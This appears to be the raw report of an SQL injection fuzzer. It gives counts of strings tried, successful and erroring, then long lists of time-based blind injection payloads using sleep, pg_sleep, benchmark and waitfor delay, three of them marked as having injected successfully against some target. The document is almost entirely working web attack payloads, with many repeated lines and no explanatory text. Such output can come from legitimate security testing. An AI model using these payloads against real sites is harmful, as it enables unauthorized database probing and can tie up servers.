----------------------------------------------
|          ------------------------          |
|          SQLi Fuzzer Conclusions:          |
|          ------------------------          |
|                                            |
|       Strings tried:                 988   |
|       Successfully Injected:         3     |
|       Made errors:                   44    |
|                                            |
|             Fuzzer parameters:             |
|             ------------------             |
|       Maximum Base string:           40    |
|       Maximum commands in string:    15    |
|                                            |
|      You can check the tested strings      |
|             in the full report             |
|             at:report_file.txt             |
----------------------------------------------

Successful Strings
------------------
' or benchmark(10000000,MD5(1)) #
' or benchmark(10000000,MD5(1)) #
1)) or sleep(2) = ' or benchmark(10000000,MD5(1)) #

Error Strings
-------------
'1)1)) ; waitfor
'1)) or pg_sleep(2)
'1 or sleep(2)
') ; waitfor
'1 or benchmark(10000000,MD5(1))
') or pg_sleep(2)
')) AnD SLEEP(2)
') or benchmark(10000000,MD5(1))
') or sleep(2)
')) ; waitfor
')1) && SLEEP(2)
) or SLEEP(2) = ' )
1)) or sleep(2) = ' or
1) or sleep(2) = ' or
") or SLEEP(2) = ' )
) ; waitfor delay '00:00:05' --
")) ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
1)) or SLEEP(2) ANd ' or
")) or SLEEP(2) + ' )
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' )
'1)1)) ;
'1)) or
'1 or
') ;
'1 or
') or
')) AnD
') or
') or
')) ;
')1) &&
' or benchmark(10000000,MD5(1))
) or SLEEP(2) = '
1)) or sleep(2) = '
1) or sleep(2) = '
") or SLEEP(2) = '
) ; waitfor delay '00:00:05'
' AnD SLEEP(2)
")) ; waitfor delay '0:0:5'
" ; waitfor delay '0:0:5'
1)) or SLEEP(2) ANd '
")) or SLEEP(2) + '
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = '

None Effective Strings
----------------------
' or
) or
) or SLEEP(2)
) or SLEEP(2) =
1)) or
1)) or sleep(2)
1)) or sleep(2) =
" or
" or benchmark(10000000,MD5(1))
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
" or benchmark(10000000,MD5(1)) #
") or
") or sleep(2)
") or sleep(2) =
") or sleep(2) = "
") or sleep(2) = " )
") or sleep(2) = " ) or
") or sleep(2) = " ) or pg_sleep(2)
") or sleep(2) = " ) or pg_sleep(2) --
") or sleep(2) = " ) or pg_sleep(2) --
") or sleep(2) = " ) or pg_sleep(2) --
") or sleep(2) = " ) or pg_sleep(2) --
") or sleep(2) = " ) or pg_sleep(2) --
") or sleep(2) = " ) or pg_sleep(2) --
") or sleep(2) = " ) or pg_sleep(2) --
") or sleep(2) = " ) or pg_sleep(2) --
")) or
")) or benchmark(10000000,MD5(1))
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
")) or benchmark(10000000,MD5(1)) #
1) or
1) or sleep(2)
1) or sleep(2) =
1)) or
1)) or pg_sleep(2)
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
1)) or pg_sleep(2) --
)) or
)) or benchmark(10000000,MD5(1))
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
)) or benchmark(10000000,MD5(1)) #
1 or
1 or pg_sleep(2)
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
1 or pg_sleep(2) --
" or
" or pg_SLEEP(2)
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
" or pg_SLEEP(2) #
") or
") or SLEEP(2)
") or SLEEP(2) =
) ;
) ; waitfor
) ; waitfor delay
")) or
")) or pg_sleep(2)
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
")) or pg_sleep(2) --
' AnD
)) or
)) or sleep(2)
)) or sleep(2) =
)) or sleep(2) = "
)) or sleep(2) = " or
)) or sleep(2) = " or SLEEP(2)
)) or sleep(2) = " or SLEEP(2) =
)) or sleep(2) = " or SLEEP(2) = "
)) or sleep(2) = " or SLEEP(2) = " or
)) or sleep(2) = " or SLEEP(2) = " or benchmark(10000000,MD5(1))
)) or sleep(2) = " or SLEEP(2) = " or benchmark(10000000,MD5(1)) #
)) or sleep(2) = " or SLEEP(2) = " or benchmark(10000000,MD5(1)) #
)) or sleep(2) = " or SLEEP(2) = " or benchmark(10000000,MD5(1)) #
)) or sleep(2) = " or SLEEP(2) = " or benchmark(10000000,MD5(1)) #
)) or sleep(2) = " or SLEEP(2) = " or benchmark(10000000,MD5(1)) #
")) ;
")) ; waitfor
")) ; waitfor delay
) or
) or benchmark(10000000,MD5(1))
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
) or benchmark(10000000,MD5(1)) #
") or
") or pg_SLEEP(2)
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
") or pg_SLEEP(2) --
" ;
" ; waitfor
" ; waitfor delay
")) or
")) or pg_SLEEP(2)
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
")) or pg_SLEEP(2) #
) or
) or pg_sleep(2)
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
) or pg_sleep(2) --
1)) or
1)) or SLEEP(2)
1)) or SLEEP(2) ANd
1)) or
1)) or pg_SLEEP(2)
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
1)) or pg_SLEEP(2) --
")) or
")) or SLEEP(2)
")) or SLEEP(2) +
) or
) or pg_SLEEP(2)
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
) or pg_SLEEP(2) #
1)) or
1)) or benchmark(10000000,MD5(1))
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
1)) or benchmark(10000000,MD5(1)) #
") or
") or pg_sleep(2)
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
") or pg_sleep(2) --
) or
) or sleep(2)
) or sleep(2) =
) or sleep(2) = "
) or sleep(2) = " )
) or sleep(2) = " ) or
) or sleep(2) = " ) or sleep(2)
) or sleep(2) = " ) or sleep(2) =
) or sleep(2) = " ) or sleep(2) = "
) or sleep(2) = " ) or sleep(2) = " or
) or sleep(2) = " ) or sleep(2) = " or sleep(2)
) or sleep(2) = " ) or sleep(2) = " or sleep(2) =
'1)1)) ;
'1)) or
'1 or
') ;
'1 or
') or
')) AnD
') or
') or
')) ;
')1) &&
' or benchmark(10000000,MD5(1))
) or SLEEP(2) = '
1)) or sleep(2) = '
1) or sleep(2) = '
") or SLEEP(2) = '
) ; waitfor delay '00:00:05'
' AnD SLEEP(2)
' AnD SLEEP(2) &&
")) ; waitfor delay '0:0:5'
" ; waitfor delay '0:0:5'
1)) or SLEEP(2) ANd '
")) or SLEEP(2) + '
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = '
'1)1)) ; waitfor
'1)1)) ; waitfor delay
'1)1)) ; waitfor delay '0:0:5'
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)) or pg_sleep(2)
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1)) or pg_sleep(2) --
'1 or sleep(2)
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
'1 or sleep(2) #
') ; waitfor
') ; waitfor delay
') ; waitfor delay '0:0:5'
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
') ; waitfor delay '0:0:5' --
'1 or benchmark(10000000,MD5(1))
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
'1 or benchmark(10000000,MD5(1)) #
') or pg_sleep(2)
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
')) AnD SLEEP(2)
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
') or benchmark(10000000,MD5(1))
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or benchmark(10000000,MD5(1)) #
') or sleep(2)
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
')) ; waitfor
')) ; waitfor delay
')) ; waitfor delay '0:0:5'
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')1) && SLEEP(2)
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
')1) && SLEEP(2) --
) or SLEEP(2) = ' )
) or SLEEP(2) = ' ) or
) or SLEEP(2) = ' ) or SLEEP(2)
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
) or SLEEP(2) = ' ) or SLEEP(2) --
1)) or sleep(2) = ' or
1)) or sleep(2) = ' or SLEEP(2)
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1)) or sleep(2) = ' or SLEEP(2) --
1) or sleep(2) = ' or
1) or sleep(2) = ' or pg_sleep(2)
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
1) or sleep(2) = ' or pg_sleep(2) --
") or SLEEP(2) = ' )
") or SLEEP(2) = ' ) or
") or SLEEP(2) = ' ) or SLEEP(2)
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
") or SLEEP(2) = ' ) or SLEEP(2) #
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
) ; waitfor delay '00:00:05' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
")) ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
" ; waitfor delay '0:0:5' --
1)) or SLEEP(2) ANd ' or
1)) or SLEEP(2) ANd ' or pg_sleep(2)
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
1)) or SLEEP(2) ANd ' or pg_sleep(2) --
")) or SLEEP(2) + ' )
")) or SLEEP(2) + ' ) or
")) or SLEEP(2) + ' ) or pg_sleep(2)
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
")) or SLEEP(2) + ' ) or pg_sleep(2) --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' )
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ;
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5'
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5' --
) or sleep(2) = " ) or sleep(2) = " or sleep(2) = ' ) ; waitfor delay '0:0:5' --
'1)1)) ;
'1)1)) ; waitfor
'1)1)) ; waitfor delay
'1)1)) ; waitfor delay '0:0:5'
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)1)) ; waitfor delay '0:0:5' --
'1)) or
'1)) or sleep(2)
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1)) or sleep(2) #
'1 or
'1 or pg_sleep(2)
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
'1 or pg_sleep(2) --
') ;
') ; waitfor
') ; waitfor delay
') ; waitfor delay '00:00:05'
') ; waitfor delay '00:00:05' #
') ; waitfor delay '00:00:05' #
') ; waitfor delay '00:00:05' #
') ; waitfor delay '00:00:05' #
') ; waitfor delay '00:00:05' #
') ; waitfor delay '00:00:05' #
') ; waitfor delay '00:00:05' #
') ; waitfor delay '00:00:05' #
') ; waitfor delay '00:00:05' #
') ; waitfor delay '00:00:05' #
') ; waitfor delay '00:00:05' #
'1 or
'1 or SLEEP(2)
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
'1 or SLEEP(2) --
') or
') or pg_sleep(2)
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
') or pg_sleep(2) --
')) AnD
')) AnD SLEEP(2)
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
')) AnD SLEEP(2) --
') or
') or sleep(2)
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or sleep(2) #
') or
') or pg_SLEEP(2)
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
') or pg_SLEEP(2) #
')) ;
')) ; waitfor
')) ; waitfor delay
')) ; waitfor delay '0:0:5'
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')) ; waitfor delay '0:0:5' --
')1) &&
')1) && SLEEP(2)
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
')1) && SLEEP(2) #
' or benchmark(10000000,MD5(1))
) or SLEEP(2) = '
) or SLEEP(2) = ' )
) or SLEEP(2) = ' ) )
) or SLEEP(2) = ' ) ) or
) or SLEEP(2) = ' ) ) or pg_sleep(2)
) or SLEEP(2) = ' ) ) or pg_sleep(2) --
) or SLEEP(2) = ' ) ) or pg_sleep(2) --
) or SLEEP(2) = ' ) ) or pg_sleep(2) --
) or SLEEP(2) = ' ) ) or pg_sleep(2) --
) or SLEEP(2) = ' ) ) or pg_sleep(2) --
) or SLEEP(2) = ' ) ) or pg_sleep(2) --
) or SLEEP(2) = ' ) ) or pg_sleep(2) --
) or SLEEP(2) = ' ) ) or pg_sleep(2) --
) or SLEEP(2) = ' ) ) or pg_sleep(2) --
